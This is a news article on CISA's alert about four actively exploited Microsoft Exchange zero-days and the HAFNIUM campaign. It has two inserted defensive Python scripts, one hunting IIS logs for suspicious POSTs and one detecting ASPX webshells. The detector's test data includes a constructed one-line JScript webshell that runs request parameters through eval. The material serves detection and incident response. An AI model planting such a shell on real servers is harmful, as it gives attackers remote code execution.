
CISA Urges Patch, as Hackers Exploit Zero-Day Flaws in Microsoft Exchange - HealthITSecurity.com


By Jessica Davis

The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert on a new out-of-band software update from Microsoft that patches four zero-day vulnerabilities in Exchange Server, all of which are already being exploited in the wild.

The flaws affect Microsoft Exchange Server 2013, 2016, and 2019. CISA warns that an attacker can exploit the three remote code execution flaws to take control of an affected system.

Meanwhile, exploiting the fourth flaw, CVE-2021-26855, gives the attacker access to the victim's data.

Microsoft issued its own alert “to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem.”

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that enables an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.


The second flaw, CVE-2021-26857, is an insecure deserialization vulnerability in the Unified Messaging service: the service deserializes untrusted, user-controllable data, which an attacker can craft to run code.

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate to the server can use it to write a file to any path on the server.

Lastly, CVE-2021-27065 is also a post-authentication arbitrary file write flaw that lets an authenticated attacker write any file to any path on the server. The required authentication can be obtained by first exploiting the SSRF flaw, or by using legitimately obtained administrator credentials.

The flaws were found by Volexity researchers who detected anomalous activity on the Microsoft Exchange servers of two clients. Analysis of the suspicious activity showed a large amount of data being sent to IP addresses not believed to be tied to legitimate users.

Further analysis of the IIS logs revealed inbound POST requests to valid static files (images, JavaScript, cascading style sheets, and fonts) used by Outlook Web Access (OWA); legitimate clients only ever fetch such files with GET.


“It was initially suspected the servers might be backdoored and that webshells were being executed through a malicious HTTP module or ISAPI filter,” researchers explained. 

The team launched incident response processes and a forensic investigation, which determined that the attackers were exploiting a zero-day SSRF vulnerability in Exchange. The attackers used the exploit to steal the full contents of several user mailboxes.
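The IIS log pattern Volexity describes above is easy to hunt for. As an added example (this is not the article's or Volexity's own tooling), the script below parses IIS W3C-format logs and flags POST requests to static OWA or ECP resources. The log lines are constructed for the example: the field layout is the standard IIS W3C format, but the hosts, IP addresses, user agents and paths are assumptions.

```python
"""Hunt IIS W3C logs for POST requests to static OWA/ECP resources.

Added example for illustration; not code from the article or from Volexity.
SAMPLE_LOG is constructed: the field layout is standard IIS W3C, but every
host, IP address, user agent and path in it is made up.
"""
from typing import Dict, Iterable, List

# Static content types that a legitimate browser only ever requests with GET.
STATIC_EXTENSIONS = (".css", ".js", ".png", ".gif", ".jpg", ".ico",
                     ".woff", ".woff2", ".ttf", ".eot", ".svg")
# Exchange virtual directories whose static files were abused (assumption: OWA and ECP).
WATCHED_PREFIXES = ("/owa/", "/ecp/")

# Constructed sample log. IIS encodes spaces inside a field as '+', so each
# field is a single whitespace-free token and a plain split() is safe.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-03-02 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2021-03-02 08:15:01 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200 15
2021-03-02 08:15:02 10.0.0.5 GET /owa/auth/current/themes/resources/logon.css - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200 3
2021-03-02 08:16:40 10.0.0.5 POST /owa/auth/current/themes/resources/logon.css - 443 - 198.51.100.23 python-requests/2.25.1 200 412
2021-03-02 08:16:41 10.0.0.5 POST /owa/auth/current/scripts/premium/flogon.js - 443 - 198.51.100.23 python-requests/2.25.1 200 388
2021-03-02 08:16:42 10.0.0.5 POST /owa/auth/current/themes/resources/segoeui-regular.woff - 443 - 198.51.100.23 python-requests/2.25.1 200 401
2021-03-02 08:18:00 10.0.0.5 POST /owa/ev.owa oeh=1&ns=Mail 443 CORP\alice 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200 44
"""


def parse_iis_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C log lines into dicts keyed by the names in the #Fields header."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()  # header may repeat mid-file
            continue
        if line.startswith("#"):
            continue  # other directive lines (#Software, #Date, ...)
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # malformed line, or data before any #Fields header
        records.append(dict(zip(fields, values)))
    return records


def is_suspicious_post(rec: Dict[str, str]) -> bool:
    """POST to a static asset under a watched Exchange virtual directory."""
    if rec.get("cs-method", "").upper() != "POST":
        return False
    stem = rec.get("cs-uri-stem", "").lower()
    return stem.startswith(WATCHED_PREFIXES) and stem.endswith(STATIC_EXTENSIONS)


def find_suspicious_posts(lines: Iterable[str]) -> List[Dict[str, str]]:
    return [r for r in parse_iis_w3c(lines) if is_suspicious_post(r)]


def summarize_by_client(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged requests per source IP so the noisiest client floats to the top."""
    counts: Dict[str, int] = {}
    for h in hits:
        ip = h.get("c-ip", "?")
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    # On a real server, replace SAMPLE_LOG with the contents of the
    # C:\inetpub\logs\LogFiles\W3SVC*\ files (path is an assumption).
    flagged = find_suspicious_posts(SAMPLE_LOG.splitlines())
    for rec in flagged:
        print(rec["date"], rec["time"], rec["c-ip"], rec["cs-method"],
              rec["cs-uri-stem"], "user=" + rec["cs-username"])
    print("per-client counts:", summarize_by_client(flagged))
```

Two details are worth keeping in mind when running this against real logs: the legitimate authenticated POST to ev.owa is correctly left alone, and every flagged request carries an empty cs-username, which is itself a useful secondary signal, since a genuine client posting to OWA has usually authenticated. A single POST to a .css file can be noise from a broken client; several from one source IP in quick succession, as in the constructed sample, is what warrants pulling the server for forensics.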

The SSRF vulnerability is remotely exploitable and requires no authentication of any kind. What's more, the attacker needs no special knowledge of, or access to, the targeted environment.

To exploit it, the attacker only needs to know the address of a server running Exchange and the account from which they want to extract email.

Of the deserialization flaw, CVE-2021-26857, Microsoft noted: “Exploiting this vulnerability gave [the attacker] the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.”


Volexity further determined that the attacker chained the SSRF flaw with one of the other Exchange vulnerabilities to achieve remote code execution on the targeted servers.

In all of the remote code execution attacks on these flaws, the researchers observed the attackers writing webshells (ASPX files) to disk and conducting a host of other malicious activities, including dumping credentials, adding user accounts, and stealing copies of the Active Directory database (NTDS.DIT).

The hackers also used these exploits to move laterally to connected systems and environments on the victims’ networks.
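Because the post-exploitation activity above begins with an ASPX webshell written to disk, a hunt on the Exchange server itself is a natural complement to the log review. The following is an added example, not code from the article, Volexity or Microsoft: it walks web roots for recently modified .aspx files whose content matches markers typical of one-line ASPX shells. The marker patterns, the age threshold, the root paths and the sample files that demo() writes to a temporary directory are all assumptions made for illustration.

```python
"""Hunt web roots for recently written ASPX files that look like webshells.

Added example; not tooling from the article, Volexity or Microsoft. The
marker regexes, age threshold and the constructed sample files written by
demo() are assumptions for illustration.
"""
import os
import re
import tempfile
import time
from typing import Dict, List

# Content markers typical of minimal ASPX shells: server-side script that
# feeds request parameters into eval or a process launcher (assumed patterns).
SHELL_MARKERS = [
    re.compile(r'runat\s*=\s*"server"', re.I),
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"Request\s*(\.Item|\[)", re.I),
    re.compile(r"System\.Diagnostics\.Process", re.I),
]


def score_file(path: str) -> int:
    """Number of shell markers present in the first 64 KiB of the file."""
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            head = fh.read(64 * 1024)  # shells are tiny; don't slurp huge files
    except OSError:
        return 0
    return sum(1 for marker in SHELL_MARKERS if marker.search(head))


def hunt(roots: List[str], max_age_days: float = 30, min_score: int = 2) -> List[Dict]:
    """Return .aspx files under roots modified within max_age_days that score >= min_score."""
    cutoff = time.time() - max_age_days * 86400
    findings: List[Dict] = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if not name.lower().endswith(".aspx"):
                    continue
                path = os.path.join(dirpath, name)
                try:
                    st = os.stat(path)
                except OSError:
                    continue
                if st.st_mtime < cutoff:
                    continue  # age filter first: cheap, and avoids reading every file
                score = score_file(path)
                if score >= min_score:
                    findings.append({"path": path, "mtime": st.st_mtime,
                                     "size": st.st_size, "score": score})
    return sorted(findings, key=lambda f: (-f["score"], f["path"]))


def demo() -> List[str]:
    """Build a constructed sample tree in a temp dir, hunt it, return relative hits."""
    benign = ('<%@ Page Language="C#" AutoEventWireup="true" %>\n'
              '<html><body>Sign in</body></html>\n')
    shellish = ('<%@ Page Language="Jscript" %>\n'
                '<script runat="server">\n'
                '  var c = Request.Item["c"]; eval(c, "unsafe");\n'
                '</script>\n')
    with tempfile.TemporaryDirectory() as tmp:
        auth = os.path.join(tmp, "owa", "auth")
        os.makedirs(auth)
        samples = {
            "logon.aspx": benign,             # legitimate page, no markers
            "sample_shell.aspx": shellish,    # fresh shell-like file: should be flagged
            "old_sample_shell.aspx": shellish,  # same content but old mtime: age-filtered
        }
        for name, body in samples.items():
            with open(os.path.join(auth, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        old = time.time() - 60 * 86400
        os.utime(os.path.join(auth, "old_sample_shell.aspx"), (old, old))
        hits = hunt([tmp], max_age_days=30, min_score=2)
        return sorted(os.path.relpath(h["path"], tmp).replace(os.sep, "/") for h in hits)


if __name__ == "__main__":
    # On a real Exchange server, point hunt() at the IIS wwwroot and the
    # Exchange FrontEnd\HttpProxy directory (exact paths vary by installation).
    print(demo())
```

The age filter is a convenience, not a guarantee: an attacker can timestomp a dropped file, so a thorough review also lists every .aspx under the Exchange and IIS directories that is not part of a known-good installation, regardless of modification time. Raising min_score trades missed variants for fewer false positives; a legitimate page rarely combines server-side script, eval and raw request parameters.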

According to Microsoft, the Chinese nation-state hacking group HAFNIUM is actively exploiting these flaws against on-premises servers in limited and targeted attacks. HAFNIUM operates primarily from leased virtual private servers (VPS) in the US.

The group primarily targets US entities across a range of industries, including infectious disease researchers, law firms, higher education institutions, and defense contractors.

In the past, HAFNIUM has compromised a host of victims by exploiting flaws in internet-facing servers. The group has also used legitimate open-source frameworks for command and control, and after a successful intrusion it has exfiltrated data to file-sharing sites such as MEGA.

In previous activity not tied to the current Exchange campaign, the attackers interacted with victims' Office 365 tenants. Though those attempts were unsuccessful, the reconnaissance allowed the attackers to identify further details about the targeted environments.

All customers are urged to update on-premises servers immediately. Exchange Online is not affected by these vulnerabilities or attacks.

Patching these flaws promptly is especially critical for the healthcare sector, given the rising demand for, and sale of, backdoor access to healthcare networks. Threat actors, including initial access brokers (IABs), scan for known flaws and other exposed endpoints to gain a foothold on a network, then sell that access online to the highest bidder.

Despite these risks, earlier data showed that at least 61 percent of internet-facing Microsoft Exchange servers remained unpatched against a previously disclosed flaw. Effective and prompt patch management is crucial for preventing long-term, undetected intrusions.

"exchange" - Google News
March 03, 2021 at 09:54PM
https://ift.tt/309BDFI